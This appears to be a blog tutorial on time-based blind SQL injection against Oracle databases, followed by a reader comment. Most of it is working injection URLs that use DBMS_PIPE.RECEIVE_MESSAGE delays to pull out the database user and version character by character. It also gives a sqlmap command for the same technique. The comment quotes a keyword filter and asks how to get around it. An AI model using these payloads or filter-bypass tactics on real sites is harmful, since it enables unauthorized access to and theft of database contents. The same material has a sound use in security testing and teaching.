To get the current database user
http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(USER+AS+VARCHAR(4000)),CHR(32))+ FROM+DUAL),1,1))=68)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) If the page loads with a delay of five seconds then the first character is ascii equivalent 68 i.e 'D'. http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(USER+AS+VARCHAR(4000)),CHR(32))+ FROM+DUAL),2,1))=117)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) If the page loads with a delay of five seconds then the first character is ascii equivalent 117 i.e 'u'. The same method can be applied to determine the rest of the characters.
To get the backend database version
http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(banner+AS+VARCHAR(4000)),CHR(32))+ FROM+v$version),1,1))=79)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) If the page loads with a delay of five seconds then the first character is ascii equivalent 79 i.e 'O'. http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(banner+AS+VARCHAR(4000)),CHR(32))+ FROM+v$version),2,1))=114)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) If the page loads with a delay of five seconds then the first character is ascii equivalent 114 i.e 'r'. And so onwards.....
To carry out time based blind oracle injection with sqlmap
./sqlmap.py -u "http://www.site.com/page.jsp?id=5" -b --dbms="oracle" --technique="T"
A very good Oracle SQL injection cheat sheet is available here.
Hello!i have a injection dot, but "'|\"|\\*|\\\\|<|>|\\(|\\)|!|;|exec|chr|char|bin|hex|oct|concat|and|select|update|insert|delete|union|from|between|trim|replace|reverse|set|mid|conv|load_file" has been filted .Can i bypass it with `select * from tables where name=INPUT` to get the name?Thanx
ReplyDelete